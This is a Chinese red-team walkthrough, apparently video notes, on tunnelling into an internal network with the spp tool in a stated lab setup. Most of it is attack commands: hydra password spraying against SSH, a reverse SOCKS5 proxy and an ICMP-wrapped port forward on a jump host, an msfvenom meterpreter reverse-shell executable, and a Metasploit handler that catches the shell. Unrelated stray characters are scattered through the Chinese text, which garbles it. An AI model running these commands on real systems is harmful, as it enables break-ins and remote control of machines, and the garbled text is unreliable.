0.實(shí)際操作視頻谎势,請移步
紅隊(duì)滲透-內(nèi)網(wǎng)穿透-spp內(nèi)網(wǎng)穿透之socks反向代理滲透內(nèi)網(wǎng)和正向代理反彈shell上線msf_嗶哩嗶哩_bilibili
聲明:請遵守網(wǎng)絡(luò)安全法来颤,若學(xué)員因此作出任何危害網(wǎng)絡(luò)安全行為后果自負(fù)码党,與我本人無關(guān)。
靶場說明
kali攻擊機(jī) 外網(wǎng) ip 192.168.1.5
centos 跳板機(jī) 外網(wǎng)192.168.1.24? 內(nèi)網(wǎng) 10.10.10.88
內(nèi)網(wǎng)主機(jī)web 10.10.10.13
1.kali運(yùn)行spp啟動server模式tcp監(jiān)聽8888端口常潮,同時監(jiān)聽ricmp協(xié)議
./spp -type server -proto tcp -listen :8888 -proto ricmp -listen 0.0.0.0? -nolog 1 -noprint 1 &?
2.kali通過密碼噴灑獲取centos的賬號密碼
└─# hydra -L /test/password/users.txt -P /test/password/passwords.txt ssh://192.168.1.24?
3.ssh登錄跳板機(jī)弟胀,內(nèi)網(wǎng)信息收集獲取內(nèi)網(wǎng)存活主機(jī)和端口,目標(biāo)機(jī)器存活喊式。
4.上傳spp到跳板機(jī)centos孵户,反向socks5代理,進(jìn)入內(nèi)網(wǎng)
# ./spp -name "16" -type reverse_socks5_client -server 192.168.1.5:8888 -fromaddr :1080 -proxyproto tcp -proto tcp -nolog 1 -noprint 1 &
5.設(shè)置proxychains
6.目標(biāo)機(jī)器10.10.10.13的8080端口存在web漏洞岔留,獲取webshell
7.msfvenom 制作木馬夏哭,木馬運(yùn)行后,反向shell到跳板機(jī)的8888端口献联,上傳到目標(biāo)機(jī)器10.10.10.13
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.10.88 lport=8888? -f exe > shiliu.exe
8.跳板機(jī)centos運(yùn)行spp tcp正向代理封裝在ricmp協(xié)議內(nèi)
./spp -name "shiliu" -type proxy_client -server 192.168.1.5 -fromaddr :8888 -toaddr :7777 -proxyproto tcp -proto ricmp -nolog 1 -noprint 1 &
9.msf監(jiān)聽7777端口
msf6 exploit(multi/handler) >use exploit/multi/handler
msf6 exploit(multi/handler) >set payload windows/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 7777
run
10.目標(biāo)機(jī)運(yùn)行shiliu.exe,msf收到反彈shell